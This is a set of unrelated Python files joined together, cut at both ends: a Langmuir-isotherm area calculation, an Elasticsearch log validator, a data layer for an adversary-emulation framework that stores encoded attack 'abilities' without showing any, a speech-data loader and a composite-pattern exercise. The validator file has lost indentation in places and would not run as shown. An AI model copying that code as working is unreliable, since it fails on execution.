    p_limits: "tuple[float,float]" = None,
):
    """
    Calculate a Langmuir surface area from raw isotherm data.

    Low-level counterpart of the main Langmuir-area function: every input
    must be supplied explicitly, nothing is read from an isotherm object.

    Parameters
    ----------
    pressure : list[float]
        Relative pressures.
    loading : list[float]
        Loadings, in mol/basis.
    cross_section : float
        Cross-sectional area of one adsorbate molecule, in nm.
    p_limits : tuple[float, float], optional
        Pressure window over which the line is fitted.

    Returns
    -------
    langmuir_area : float
        Calculated Langmuir surface area.
    langmuir_const : float
        K constant from the Langmuir equation.
    n_monolayer : float
        Adsorbed quantity in the monolayer.
    slope : float
        Slope of the fitted Langmuir line.
    intercept : float
        Intercept of the fitted Langmuir line.
    minimum : float
        Index of the first point of the linear region.
    maximum : float
        Index of the last point of the linear region.
    corr_coef : float
        Correlation coefficient of the fitted line.
    """
    # Guard clauses on the raw input.
    if len(pressure) == 0:
        raise ParameterError("Empty input values!")
    if len(pressure) != len(loading):
        raise ParameterError("The length of the pressure and loading arrays do not match.")

    # Work on numpy arrays from here on.
    pressure = numpy.asarray(pressure)
    loading = numpy.asarray(loading)

    # Absolute indices bounding the fitted region.
    minimum = 0
    maximum = len(pressure) - 1
    if p_limits is None:
        # Automatic window: 5% .. 90% of the maximum pressure.
        p_limits = [
            pressure[maximum] * 0.05,
            pressure[maximum] * 0.9,
        ]
    if p_limits[0]:
        minimum = numpy.searchsorted(pressure, p_limits[0])
    if p_limits[1]:
        maximum = numpy.searchsorted(pressure, p_limits[1]) - 1
    if maximum - minimum < 2:  # (for 2 point minimum)
        raise CalculationError(
            "The isotherm does not have enough points (at least 2) "
            "in selected region. Unable to calculate Langmuir area."
        )

    # Restrict both arrays to the selected window.
    region = slice(minimum, maximum + 1)
    pressure = pressure[region]
    loading = loading[region]

    # Fit a straight line through the Langmuir-transformed points.
    slope, intercept, corr_coef = langmuir_fit(
        pressure,
        langmuir_transform(pressure, loading),
    )

    # Convert the fit into physical quantities.
    n_monolayer, langmuir_const, langmuir_area = langmuir_parameters(
        slope,
        intercept,
        cross_section,
    )

    # Consistency warnings for the caller.
    if langmuir_const < 0:
        logger.warning("The Langmuir constant is negative.")
    if corr_coef < 0.99:
        logger.warning("The correlation is not linear.")

    return (
        langmuir_area,
        langmuir_const,
        n_monolayer,
        slope,
        intercept,
        minimum,
        maximum,
        corr_coef,
    )
def langmuir_transform(pressure, loading):
    """Return the Langmuir-plot ordinate (p / n) for the given points."""
    transformed = pressure / loading
    return transformed
def langmuir_fit(pressure, langmuir_points):
    """Least-squares fit of the linearised Langmuir region.

    Returns the slope, intercept and correlation coefficient of the
    straight line through the transformed points.
    """
    fit = stats.linregress(pressure, langmuir_points)
    return fit[0], fit[1], fit[2]
def langmuir_parameters(slope, intercept, cross_section):
    """Convert the Langmuir-plot slope and intercept into physical values.

    Returns the monolayer amount, the Langmuir K constant, and the
    Langmuir area (cross_section is the molecular area in nm2; the
    10^-18 factor converts nm2 to m2).
    """
    n_monolayer = 1 / slope
    langmuir_const = 1 / (intercept * n_monolayer)
    langmuir_area = n_monolayer * cross_section * (10**(-18)) * constants.Avogadro
    return n_monolayer, langmuir_const, langmuir_area
def simple_lang(pressure, n_total, k_const):
    """Evaluate the basic Langmuir isotherm: loading at a given pressure."""
    numerator = n_total * k_const * pressure
    denominator = 1 + k_const * pressure
    return (numerator / denominator)
|
"""
Entry point for the program.
"""
from __future__ import print_function
from es_insanity_checker import ESInsanityChecker
from es_logs_reloader import ESLogsReloader
from es_duplicates_handler import ESDuplicatesHandler
from es_logger import ESLogger
from traceback import print_exc
from optparse import OptionParser
from yaml import load, dump
from tqdm import tqdm
import time
try:
from yaml import CLoader as Loader, CDumper as Dumper
except ImportError:
from yaml import Loader, Dumper
def get_option_parser():
    """
    Build the command-line parser for this program.

    :return: OptionParser object
    """
    opt_parser = OptionParser()
    opt_parser.add_option(
        "-c", "--config_file",
        action="store", type="string", dest="config_file",
        help="A yaml configuration file, configures program's behavior.",
    )
    return opt_parser
def main():
    """Program entry point.

    Reads the yaml configuration named by ``-c/--config_file``, builds the
    insanity checker, log reloader and duplicate handler from it, then runs
    the three stages in order: checks, reload, deduplication.

    :raises KeyError: if a required configuration key is missing.
    :raises ValueError: if a configuration value is malformed.
    """
    # Parse arguments
    parser = get_option_parser()
    (options, args) = parser.parse_args()
    # Read configuration from yaml file.
    # PyYAML >= 5 requires an explicit Loader; use the (C-accelerated when
    # available) Loader imported at the top of this module.
    with open(options.config_file, "r") as file_obj:
        data = load(file_obj, Loader=Loader)
    # Don't generate test output in duplicate handler unless the
    # option is enabled in the config file
    generate_test_output = False
    try:
        # Create logger for main module
        logger_options = data["logger"]
        logger_path = logger_options["logger_path"]
        # Create new ESLogger
        if logger_path:
            log_instance = ESLogger(name=__name__, filename=logger_path)
        else:
            log_instance = ESLogger(name=__name__)
        es_logger = log_instance.get_es_logger()
        # Initiates ESInsanityChecker object with args from yaml file
        ic_options = data["insanity_checker"]
        insanity_checker = ESInsanityChecker(es_host=ic_options["es_host"],
                                             es_port=ic_options["es_port"],
                                             output_dir=ic_options["output_dir"],
                                             logs_dir=ic_options["logs_dir"],
                                             output_format=ic_options["output_format"],
                                             logger_path=logger_path)
        # Initiates ESLogsReloader object with args from yaml file.
        # BUG FIX: this previously constructed a second ESInsanityChecker
        # with reloader arguments; ESLogsReloader (imported above but never
        # used before) is the intended class.
        r_options = data["reloader"]
        reloader = ESLogsReloader(ls_host=r_options["ls_host"],
                                  ls_port=r_options["ls_port"],
                                  input_format=r_options["input_format"],
                                  input_dir=r_options["input_dir"],
                                  logger_path=logger_path)
        # Initiates ESDuplicateHandler object with args from yaml file
        dh_options = data["duplicate_handler"]
        duplicate_handler = ESDuplicatesHandler(es_host=dh_options["es_host"],
                                                es_port=dh_options["es_port"],
                                                test_output_dir=dh_options["test_output_dir"],
                                                hash_keys=dh_options["hash_keys"],
                                                reserved_index_names=dh_options["reserved_index_names"],
                                                logger_path=logger_path)
        generate_test_output = dh_options["generate_test_output"]
    except KeyError as e:
        print_exc()
        raise KeyError("Illegal configuration, read configuration guide from pointers.") from e
    except ValueError as e:
        print_exc()
        raise ValueError("Illegal configuration, read configuration guide from pointers.") from e
    # Run general tests
    print("Running insanity checks...")
    es_logger.info("Running insanity checks...")
    insanity_checker.run_tests()
    print("Finished Insanity checks...")
    es_logger.info("Finished Insanity checks...")
    # Reloads missing logs to elasticsearch through logstash
    print("Reloading missing logs...")
    es_logger.info("Reloading missing logs...")
    # NOTE(review): method name 'reaload_logs' looks like a typo for
    # 'reload_logs' -- confirm against the ESLogsReloader API before renaming.
    reloader.reaload_logs()
    print("Waiting for reloader to finish loading docs...")
    es_logger.info("Waiting for reloader to finish loading docs...")
    for i in tqdm(range(10)):
        time.sleep(1)  # Change to 30 later
    print("Finished reloading logs...")
    es_logger.info("Finished reloading logs...")
    # Locate and delete duplicate documents in elasticsearch cluster
    print("Deduplicating docs...")
    es_logger.info("Deduplicating docs...")
    # TODO do this with multi processes
    if generate_test_output:
        duplicate_handler.deduplicate_docs_and_test_results()
    else:
        duplicate_handler.deduplicate_docs()
    print("Waiting for ESDuplicatesHandler to delete duplicates")
    es_logger.info("Waiting for ESDuplicatesHandler to delete duplicates")
    for i in tqdm(range(5)):
        time.sleep(1)
    print("Finished deduplicating docs...")
    es_logger.info("Finished deduplicating docs...")
    print("Finished validator tasks successfully...")
    es_logger.debug("Finished validator tasks successfully...")
if __name__ == '__main__':
main()
|
import glob
import json
from base64 import b64encode
from collections import defaultdict
from app.objects.c_planner import Planner
from app.service.base_service import BaseService
from app.utility.rule import RuleAction
class DataService(BaseService):
    """Data access layer.

    Persists core objects (operations, abilities, facts, ...) to SQL via
    the DAO, and keeps first-class objects (agents, planners) in RAM.
    """

    def __init__(self, dao):
        self.dao = dao
        self.log = self.add_service('data_svc', self)
        # in-memory object store, keyed by collection name
        self.ram = dict(agents=[], planners=[])

    async def apply(self, collection):
        """
        Add a new collection to RAM
        :param collection:
        :return:
        """
        self.ram[collection] = []

    async def load_data(self, directory=None, schema='conf/core.sql'):
        """
        Read all the data sources to populate the SQL database
        :param directory:
        :param schema:
        :return: None
        """
        with open(schema) as schema:
            await self.dao.build(schema.read())
        if directory:
            self.log.debug('Loading data from %s' % directory)
            await self._load_abilities(directory='%s/abilities' % directory)
            await self._load_adversaries(directory='%s/adversaries' % directory)
            await self._load_facts(directory='%s/facts' % directory)
            await self._load_planners(directory='%s/planners' % directory)

    async def save(self, object_name, object_dict):
        """
        Save a dict() for any object
        :param object_name:
        :param object_dict:
        :return:
        """
        try:
            if object_name == 'operation':
                return await self._create_operation(**object_dict)
            elif object_name == 'link':
                return await self._create_link(object_dict)
            elif object_name == 'adversary':
                return await self._create_adversary(**object_dict)
            elif object_name == 'ability':
                return await self._create_ability(**object_dict)
            elif object_name == 'relationship':
                return await self.dao.create('core_relationship', object_dict)
            elif object_name == 'fact':
                return await self.dao.create('core_fact', object_dict)
            elif object_name == 'result':
                return await self.dao.create('core_result', object_dict)
            self.log.warning('[!] SAVE on non-core type: %s' % object_name)
            return await self.dao.create(object_name, object_dict)
        except Exception as e:
            self.log.error('[!] SAVE %s: %s' % (object_name, e))

    async def delete(self, object_name, criteria):
        """
        Delete any object in the database by table name and ID
        :param object_name: the name of the table
        :param criteria: a dict of key/value pairs to match on
        """
        self.log.debug('Deleting %s from %s' % (criteria, object_name))
        await self.dao.delete('core_%s' % object_name, data=criteria)

    async def update(self, object_name, key, value, data):
        """
        Update any field in any table in the database
        :param object_name:
        :param key:
        :param value:
        :param data:
        :return: None
        """
        await self.dao.update('core_%s' % object_name, key, value, data)

    async def get(self, object_name, criteria=None):
        """
        Get the contents of any object
        :param object_name:
        :param criteria:
        :return: a list of dictionary results
        """
        try:
            if object_name == 'operation':
                return await self.dao.get('core_operation', criteria)
            elif object_name == 'chain':
                return await self.dao.get('core_chain', criteria)
            elif object_name == 'ability':
                return await self.dao.get('core_ability', criteria)
            elif object_name == 'payload':
                return await self.dao.get('core_payload', criteria)
            elif object_name == 'used':
                return await self.dao.get('core_used', criteria)
            elif object_name == 'fact':
                return await self.dao.get('core_fact', criteria)
            self.log.warning('[!] GET on non-core type: %s' % object_name)
            return await self.dao.get(object_name, criteria)
        except Exception as e:
            self.log.error('[!] GET %s: %s' % (object_name, e))

    async def explode(self, object_name, criteria=None):
        """
        Get an exploded version of any object
        :param object_name:
        :param criteria:
        :return:
        """
        try:
            if object_name == 'operation':
                return await self._explode_operation(criteria)
            elif object_name == 'chain':
                return await self._explode_chain(criteria)
            elif object_name == 'adversary':
                return await self._explode_adversaries(criteria)
            elif object_name == 'ability':
                return await self._explode_abilities(criteria)
            elif object_name == 'parser':
                return await self._explode_parser(criteria)
            elif object_name == 'source':
                return await self._explode_sources(criteria)
            elif object_name == 'result':
                return await self._explode_results(criteria)
            elif object_name == 'used':
                return await self._explode_used(criteria)
            self.log.error('[!] EXPLODE on unknown type: %s' % object_name)
        except Exception as e:
            self.log.error('[!] EXPLODE %s: %s' % (object_name, e))

    async def store(self, c_object):
        """
        Accept any c_object type and store it (create/update) in RAM
        :param c_object:
        :return: a single c_object
        """
        try:
            return c_object.store(self.ram)
        except Exception as e:
            self.log.error('[!] STORE: %s' % e)

    async def locate(self, object_name, match=None):
        """
        Find all c_objects which match a search. Return all c_objects if no match.
        :param object_name:
        :param match: dict()
        :return: a list of c_object types
        """
        try:
            return [obj for obj in self.ram[object_name] if obj.match(match)]
        except Exception as e:
            self.log.error('[!] LOCATE: %s' % e)

    async def remove(self, object_name, match):
        """
        Remove any c_objects which match a search
        :param object_name:
        :param match: dict()
        :return:
        """
        try:
            self.ram[object_name][:] = [obj for obj in self.ram[object_name] if not obj.match(match)]
        except Exception as e:
            self.log.error('[!] REMOVE: %s' % e)

    """ PRIVATE """

    async def _explode_abilities(self, criteria=None):
        # Attach parsers, payloads and requirements to each ability row.
        abilities = await self.dao.get('core_ability', criteria=criteria)
        for ab in abilities:
            ab['cleanup'] = '' if ab['cleanup'] is None else ab['cleanup']
            ab['parsers'] = await self.dao.get('core_parser', dict(ability=ab['id']))
            ab['payload'] = await self.dao.get('core_payload', dict(ability=ab['id']))
            ab['requirements'] = await self.dao.get('core_requirement', dict(ability=ab['id']))
            for r in ab['requirements']:
                r['enforcements'] = (await self.dao.get('core_requirement_map', dict(requirement_id=r['id'])))[0]
        return abilities

    async def _explode_adversaries(self, criteria=None):
        # Group each adversary's abilities by phase.
        adversaries = await self.dao.get('core_adversary', criteria)
        for adv in adversaries:
            phases = defaultdict(list)
            for t in await self.dao.get('core_adversary_map', dict(adversary_id=adv['adversary_id'])):
                for ability in await self._explode_abilities(dict(ability_id=t['ability_id'])):
                    ability['adversary_map_id'] = t['id']
                    phases[t['phase']].append(ability)
            adv['phases'] = dict(phases)
        return adversaries

    async def _explode_operation(self, criteria=None):
        # Attach the chain, adversary, host group, facts and rules.
        operations = await self.dao.get('core_operation', criteria)
        for op in operations:
            op['chain'] = sorted(await self._explode_chain(criteria=dict(op_id=op['id'])), key=lambda k: k['id'])
            adversaries = await self._explode_adversaries(dict(id=op['adversary_id']))
            op['adversary'] = adversaries[0]
            op['host_group'] = await self.locate('agents', match=dict(group=op['host_group']))
            sources = await self.dao.get('core_source_map', dict(op_id=op['id']))
            source_list = [s['source_id'] for s in sources]
            op['facts'] = await self.dao.get_in('core_fact', 'source_id', source_list)
            for fact in op['facts']:
                fact['relationships'] = await self._add_fact_relationships(dict(source=fact['id']))
            op['rules'] = await self._sort_rules_by_fact(await self.dao.get_in('core_rule', 'source_id', source_list))
        return operations

    async def _explode_results(self, criteria=None):
        # Attach each result's chain link (with its facts).
        results = await self.dao.get('core_result', criteria=criteria)
        for r in results:
            link = await self.dao.get('core_chain', dict(id=r['link_id']))
            link[0]['facts'] = await self.dao.get('core_fact', dict(link_id=link[0]['id']))
            r['link'] = link[0]
        return results

    async def _explode_chain(self, criteria=None):
        # Enrich each link with its ability name and description.
        chain = []
        for link in await self.dao.get('core_chain', criteria=criteria):
            a = await self.dao.get('core_ability', criteria=dict(id=link['ability']))
            chain.append(dict(abilityName=a[0]['name'], abilityDescription=a[0]['description'], **link))
        return chain

    async def _explode_sources(self, criteria=None):
        # Attach each source's facts.
        sources = await self.dao.get('core_source', criteria=criteria)
        for s in sources:
            s['facts'] = await self.dao.get('core_fact', dict(source_id=s['id']))
        return sources

    async def _explode_parser(self, criteria=None):
        # Attach each parser's mappers.
        parsers = await self.dao.get('core_parser', criteria)
        for parser in parsers:
            parser['mappers'] = await self.dao.get('core_parser_map', dict(parser_id=parser['id']))
        return parsers

    async def _explode_used(self, criteria=None):
        # Resolve the property/value of each used fact.
        used_facts = await self.dao.get('core_used', criteria=criteria)
        for uf in used_facts:
            fact = (await self.dao.get('core_fact', dict(id=uf['fact_id'])))[0]
            uf['property'] = fact['property']
            uf['value'] = fact['value']
        return used_facts

    async def _create_link(self, link):
        # Persist the link, then its used-fact associations.
        used = link.pop('used', [])
        link_id = await self.dao.create('core_chain', link)
        for uf in used:
            await self.dao.create('core_used', dict(link_id=link_id, fact_id=uf))

    async def _create_adversary(self, i, name, description, phases):
        # Upsert the adversary, then replace its phase->ability mapping.
        identifier = await self.dao.create('core_adversary',
                                           dict(adversary_id=i, name=name, description=description))
        await self.dao.delete('core_adversary_map', data=dict(adversary_id=i))
        for ability in phases:
            a = dict(adversary_id=i, phase=ability['phase'], ability_id=ability['id'])
            await self.dao.create('core_adversary_map', a)
        return identifier

    async def _write_ability(self, filename):
        # Parse a yaml ability file: one ability per platform/executor combo.
        for entries in self.strip_yml(filename):
            for ab in entries:
                for pl, executors in ab['platforms'].items():
                    for name, info in executors.items():
                        for e in name.split(','):
                            encoded_test = b64encode(info['command'].strip().encode('utf-8'))
                            await self._create_ability(ability_id=ab.get('id'), tactic=ab['tactic'].lower(),
                                                       technique_name=ab['technique']['name'],
                                                       technique_id=ab['technique']['attack_id'],
                                                       test=encoded_test.decode(),
                                                       description=ab.get('description') or '',
                                                       executor=e, name=ab['name'], platform=pl,
                                                       cleanup=b64encode(
                                                           info['cleanup'].strip().encode(
                                                               'utf-8')).decode() if info.get(
                                                           'cleanup') else None,
                                                       payload=info.get('payload'), parsers=info.get('parsers', []),
                                                       requirements=ab.get('requirements', []))
                await self._delete_stale_abilities(ab)

    async def _load_abilities(self, directory):
        for filename in glob.iglob('%s/**/*.yml' % directory, recursive=True):
            await self._write_ability(filename)

    async def _load_adversaries(self, directory):
        for filename in glob.iglob('%s/*.yml' % directory, recursive=True):
            for adv in self.strip_yml(filename):
                phases = [dict(phase=k, id=i) for k, v in adv.get('phases', dict()).items() for i in v]
                for pack in [await self._add_adversary_packs(p) for p in adv.get('packs', [])]:
                    phases += pack
                if adv.get('visible', True):
                    await self._create_adversary(adv['id'], adv['name'], adv['description'], phases)

    async def _load_facts(self, directory):
        for filename in glob.iglob('%s/*.yml' % directory, recursive=False):
            for source in self.strip_yml(filename):
                source_id = await self.dao.create('core_source', dict(name=source['name']))
                for fact in source.get('facts', []):
                    fact['source_id'] = source_id
                    fact['score'] = fact.get('score', 1)
                    await self.save('fact', fact)
                for rule in source.get('rules', []):
                    rule['source_id'] = source_id
                    await self._create_rule(**rule)

    async def _load_planners(self, directory):
        for filename in glob.iglob('%s/*.yml' % directory, recursive=False):
            for planner in self.strip_yml(filename):
                await self.store(
                    Planner(name=planner.get('name'), module=planner.get('module'),
                            params=json.dumps(planner.get('params')))
                )
        self.log.debug('Loaded %s planners' % len(self.ram['planners']))

    async def _create_rule(self, fact, source_id, action='DENY', match='.*'):
        try:
            action = RuleAction[action.upper()].value
            await self.dao.create('core_rule', dict(fact=fact, source_id=source_id, action=action, match=match))
        except KeyError:
            self.log.error(
                'Rule action must be in [%s] not %s' % (', '.join(RuleAction.__members__.keys()), action.upper()))

    async def _create_ability(self, ability_id, tactic, technique_name, technique_id, name, test, description, executor,
                              platform, cleanup=None, payload=None, parsers=None, requirements=None):
        ability = dict(ability_id=ability_id, name=name, test=test, tactic=tactic,
                       technique_id=technique_id, technique_name=technique_name,
                       executor=executor, platform=platform, description=description,
                       cleanup=cleanup)
        # update
        unique_criteria = dict(ability_id=ability_id, platform=platform, executor=executor)
        for entry in await self.dao.get('core_ability', unique_criteria):
            await self.update('core_ability', 'id', entry['id'], ability)
            for parser in await self.dao.get('core_parser', dict(ability=entry['id'])):
                await self.dao.delete('core_parser_map', dict(parser_id=parser['id']))
            for requirement in await self.dao.get('core_requirement', dict(ability=entry['id'])):
                await self.dao.delete('core_requirement_map', dict(requirement_id=requirement['id']))
            await self.dao.delete('core_parser', dict(ability=entry['id']))
            await self.dao.delete('core_payload', dict(ability=entry['id']))
            return await self._save_ability_extras(entry['id'], payload, parsers, requirements)
        # new
        identifier = await self.dao.create('core_ability', ability)
        return await self._save_ability_extras(identifier, payload, parsers, requirements)

    @staticmethod
    async def _sort_rules_by_fact(rules):
        # Index rules by the fact they apply to.
        organized_rules = defaultdict(list)
        for rule in rules:
            fact = rule.pop('fact')
            organized_rules[fact].append(rule)
        return organized_rules

    async def _save_ability_extras(self, identifier, payload, parsers, requirements):
        if payload:
            await self.dao.create('core_payload', dict(ability=identifier, payload=payload))
        await self._save_ability_relationships(identifier, table='core_parser', id_type='parser_id',
                                               relationships=parsers)
        await self._save_ability_relationships(identifier, table='core_requirement', id_type='requirement_id',
                                               relationships=requirements)
        return identifier

    async def _save_ability_relationships(self, identifier, table, id_type, relationships):
        for module in relationships:
            _id = await self.dao.create(table, dict(ability=identifier, module=module))
            for r in relationships.get(module):
                relationship = {id_type: _id, 'source': r.get('source'), 'edge': r.get('edge'),
                                'target': r.get('target')}
                await self.dao.create('%s_map' % table, relationship)

    async def _delete_stale_abilities(self, ability):
        # Remove DB rows whose platform/executor no longer exists in the yaml.
        for saved in await self.dao.get('core_ability', dict(ability_id=ability.get('id'))):
            for platform, executors in ability['platforms'].items():
                if platform == saved['platform'] and not saved['executor'] in str(executors.keys()):
                    await self.dao.delete('core_ability', dict(id=saved['id']))
            if saved['platform'] not in ability['platforms']:
                await self.dao.delete('core_ability', dict(id=saved['id']))

    async def _add_adversary_packs(self, pack):
        _, filename = await self.get_service('file_svc').find_file_path('%s.yml' % pack, location='data')
        for adv in self.strip_yml(filename):
            return [dict(phase=k, id=i) for k, v in adv.get('phases').items() for i in v]

    async def _add_fact_relationships(self, criteria=None):
        relationships = await self.dao.get('core_relationship', criteria)
        return [dict(edge=r.get('edge'), target=(await self.dao.get('core_fact', dict(id=r.get('target'))))[0])
                for r in relationships if r.get('target')]

    async def _create_operation(self, name, group, adversary_id, jitter='2/8', sources=None,
                                planner=None, state=None, allow_untrusted=False, autonomous=True):
        # BUG FIX: the default was the mutable literal `sources=[]`, which is
        # shared across calls; use None as sentinel instead (same behavior).
        sources = sources if sources is not None else []
        op_id = await self.dao.create('core_operation', dict(
            name=name, host_group=group, adversary_id=adversary_id, finish=None, phase=0, jitter=jitter,
            start=self.get_current_timestamp(), planner=planner, state=state,
            allow_untrusted=allow_untrusted, autonomous=autonomous))
        source_id = await self.dao.create('core_source', dict(name=name))
        await self.dao.create('core_source_map', dict(op_id=op_id, source_id=source_id))
        for s_id in [s for s in sources if s]:
            await self.dao.create('core_source_map', dict(op_id=op_id, source_id=s_id))
        return op_id
|
import os
import random
from struct import unpack
from subprocess import call, PIPE
import numpy as np
import tensorflow as tf
from utils import utils
from pathlib import Path
class BaseInputData():
    """Base loader for tab-separated speech datasets.

    Loads the vocabulary, optional feature-normalisation statistics and the
    dataset rows for the current mode, and provides feature loading
    (htk / wav / npy / webm) plus id<->word decoding helpers.
    """

    def __init__(self,
                 hparams,
                 mode,
                 batch_size,
                 dev=False):
        self.hparams = hparams
        self.mode = mode
        self.vocab = self.load_vocab(hparams.vocab_file)
        self.vocab_size = len(self.vocab)

        # Optional per-dimension normalisation statistics (one value per line).
        if hparams.norm_mean_path is not None:
            with open(hparams.norm_mean_path) as f:
                mean = f.read().split('\n')[:-1]
            self.mean = np.array([float(x) for x in mean])
            with open(hparams.norm_var_path) as f:
                var = f.read().split('\n')[:-1]
            self.var = np.array([float(x) for x in var])
        else:
            self.mean = self.var = None

        hparams.vocab_size = self.vocab_size
        self.batch_size = tf.cast(batch_size, tf.int64)

        # Pick the data file for the requested mode.
        if self.mode == tf.estimator.ModeKeys.TRAIN:
            self.data_filename = hparams.train_data
        elif self.mode == tf.estimator.ModeKeys.EVAL:
            self.data_filename = hparams.test_data if not dev else hparams.dev_data
        elif self.mode == tf.estimator.ModeKeys.PREDICT:
            self.data_filename = hparams.input_path

        self.filenames = tf.placeholder(dtype=tf.string)
        self.targets = tf.placeholder(dtype=tf.string)

        # Read tsv rows: first line is the header, each following line a record.
        inputs = []
        with open(Path(self.data_filename), "r", encoding=self.hparams.encoding) as f:
            headers = f.readline().split('\t')
            for line in f.read().split('\n'):
                if self.mode != tf.estimator.ModeKeys.PREDICT:
                    # skip blank lines except in predict mode
                    if line.strip() == "": continue
                record = {headers[i]: dat for i, dat in enumerate(line.strip().split('\t'))}
                if hparams.get('use_sos_eos', False) and 'target' in record:
                    # wrap the target id sequence in <sos> ... <eos>
                    record['target'] = "%d %s %d" % (
                        self.hparams.sos_index, record['target'],
                        self.hparams.eos_index)
                inputs.append(record)
        self.size = len(inputs)
        self.inputs = inputs

    def load_vocab(self, vocab_file):
        """Load a vocabulary file into an {id: label} dict.

        Lines are either "word id" pairs or bare words (numbered in order).
        Also assigns the <eos>/<sos> special-token ids on hparams.
        """
        labels = []
        count = 0
        with open(Path(vocab_file), encoding=self.hparams.encoding) as f:
            for s in f.read().split('\n'):
                if ' ' in s:  # word id
                    labels.append(s.strip().split(' ', 1))
                else:  # word
                    labels.append((s, str(count)))
                    count += 1
        vocab = {int(id): label for label, id in labels}
        # BUG FIX: a stray early `return vocab` here previously made the
        # <eos>/<sos> setup below unreachable, yet __init__ relies on
        # hparams.sos_index when use_sos_eos is enabled. Removed it.
        # NOTE(review): `True or ...` force-enables this branch -- confirm
        # whether the use_sos_eos condition should actually be honoured.
        if True or self.hparams.get('use_sos_eos', False):
            self.hparams.eos_index = len(labels)
            self.hparams.sos_index = len(labels) + 1
            vocab[len(labels)] = '<eos>'
            vocab[len(labels) + 1] = '<sos>'
        elif self.hparams.get('eos_index', None) is None:
            self.hparams.eos_index = len(labels)
            vocab[len(labels)] = '<eos>'
        return vocab

    def get_batched_dataset(self, dataset):
        """Batch (and pad) the dataset using the shared utility helper."""
        return utils.get_batched_dataset(
            dataset,
            self.batch_size,
            self.hparams.num_features,
            # self.hparams.num_buckets,
            self.mode,
            padding_values=self.hparams.get("eos_index", len(self.vocab) - 1)
        )

    def load_wav(self, filename):
        """Convert a wav file to features via HTK's HCopy and read them back.

        Applies normalisation: per-utterance if no global stats were loaded,
        otherwise the global mean/variance.
        """
        outfile = "tmp.htk"
        call([
            self.hparams.hcopy_path,
            "-C", self.hparams.hcopy_config, "-T", "1",
            filename.decode('ascii'), outfile
        ], stdout=PIPE)
        # HTK header: nSamples, sampPeriod (uint32), sampSize, parmKind (uint16)
        with open(outfile, "rb") as fh:
            header = fh.read(12)
            nSamples, sampPeriod, sampSize, parmKind = unpack(">IIHH", header)
            veclen = int(sampSize / 4)  # 4 bytes per float32 coefficient
            fh.seek(12, 0)
            dat = np.fromfile(fh, dtype=np.float32)
        dat = dat.reshape(len(dat) // veclen, veclen)
        dat = dat.byteswap()  # HTK files are big-endian
        if self.mean is None:
            dat = (dat - dat.mean()) / np.std(dat)
        else:
            dat = (dat - self.mean) / np.sqrt(self.var)
        return np.float32(dat)

    def load_htk(self, filename):
        """Read a raw HTK feature file into an (n_frames, veclen) array."""
        with open(filename, "rb") as fh:
            header = fh.read(12)
            nSamples, sampPeriod, sampSize, parmKind = unpack(">IIHH", header)
            veclen = int(sampSize / 4)
            fh.seek(12, 0)
            dat = np.fromfile(fh, dtype=np.float32)
        # drop a trailing partial frame, if any
        if len(dat) % veclen != 0: dat = dat[:len(dat) - len(dat) % veclen]
        dat = dat.reshape(len(dat) // veclen, veclen)
        dat = dat.byteswap()
        return dat

    def load_npy(self, filename):
        """Load a .npy feature file; return a 1x1 zero array if it's missing."""
        if os.path.exists(filename.decode('utf-8')):
            return np.load(filename.decode('utf-8')).astype(np.float32)
        else:
            return np.array([[0.0]], dtype=np.float32)

    def load_input(self, filepath):
        """Dispatch feature loading on file extension (htk/wav/npy/webm)."""
        # NOTE(review): debug print left in place -- remove once no longer needed.
        print(filepath)
        ext = os.path.splitext(filepath)[1]
        if ext == b".htk":
            return self.load_htk(filepath)
        elif ext == b".wav":
            return self.load_wav(filepath)
        elif ext == b".npy":
            return self.load_npy(filepath)
        elif ext in {b'.webm'}:
            # transcode webm -> wav with ffmpeg, then load as wav
            import ffmpeg
            stream = ffmpeg.input(filepath)
            output_path = os.path.join('tmp', 'output.wav')
            stream = ffmpeg.output(stream, output_path)
            ffmpeg.run(stream)
            dat = self.load_wav(output_path)
            os.remove(output_path)
            return dat
        else:
            # unknown extension: return a small dummy feature block
            return np.array([[0.0] * 120] * 8).astype(np.float32)

    def extract_target_features(self, str):
        """Parse a space-separated id string into a nested int list."""
        return [[int(x) for x in str.decode('utf-8').split(' ')]]

    def get_word(self, id):
        """Return the label for a vocabulary id."""
        return self.vocab[id]

    def decode(self, d, id):
        """Decode from label ids to words"""
        ret = []
        for c in d:
            if c < 0: continue
            if self.vocab[c] == '<eos>': return ret  # stop at end-of-sequence
            if self.vocab[c] == '<sos>': continue
            val = self.get_word(c)
            # (c is guaranteed to be in self.vocab at this point, otherwise the
            # lookups above would already have raised)
            if val != '':
                ret.append(val)
        return ret

    def shuffle(self, inputs, bucket_size=None):
        """Shuffle inputs, optionally only within consecutive buckets."""
        if bucket_size:
            shuffled_inputs = []
            # BUG FIX: ceil-divide so the trailing partial bucket is not
            # silently dropped (previously `len // bucket_size` truncated it).
            for i in range(0, (len(inputs) + bucket_size - 1) // bucket_size):
                start, end = i * bucket_size, min((i + 1) * bucket_size, len(inputs))
                ls = inputs[start:end]
                random.shuffle(ls)
                shuffled_inputs += ls
            return shuffled_inputs
        else:
            ls = list(inputs)
            random.shuffle(ls)
            return ls

    def get_inputs_list(self, inputs, field):
        """Extract one field from every record of the given inputs."""
        # BUG FIX: previously iterated self.inputs, ignoring the `inputs`
        # parameter entirely.
        return [inp[field] for inp in inputs]
|
<reponame>zhguokai/PythonStudy
# -*- coding: utf-8 -*-
"""
公司层级间的组合模式应用
Created by 相濡HH on 3/19/15.
"""
class Company(object):
    """Component interface of the company composite hierarchy."""

    def __init__(self, name):
        """Store the company's name."""
        self._name = name

    def add(self, company):
        """Attach a child company (no-op in the base interface)."""

    def remvoe(self, company):
        """Detach a child company (no-op; original spelling kept for
        compatibility with existing callers)."""

    def display(self, depth):
        """Print this node at the given indentation depth (no-op here)."""

    def run_resp(self):
        """Carry out this company's duty (no-op here)."""
class ConcreteCompany(Company):
    """Composite node: a company that may contain sub-companies/departments."""

    def __init__(self, name):
        """Initialise with a name and an empty child list."""
        Company.__init__(self, name)
        # child nodes (attribute name kept as-is for compatibility)
        self.compay_list = []

    def add(self, company):
        """Append a child company."""
        self.compay_list.append(company)

    def remvoe(self, company):
        """Remove a child company (original spelling preserved)."""
        self.compay_list.remove(company)

    def display(self, depth):
        """Print this node, then every child two levels deeper."""
        print("-" * depth + self._name)
        for child in self.compay_list:
            child.display(depth + 2)

    def run_resp(self):
        """Announce the duty, then delegate it to every child."""
        print("执行任务")
        for child in self.compay_list:
            child.run_resp()
class HRCompany(Company):
    """Leaf node: human-resources department."""

    def __init__(self, name):
        """Initialise the department with its name."""
        Company.__init__(self, name)

    def add(self, company):
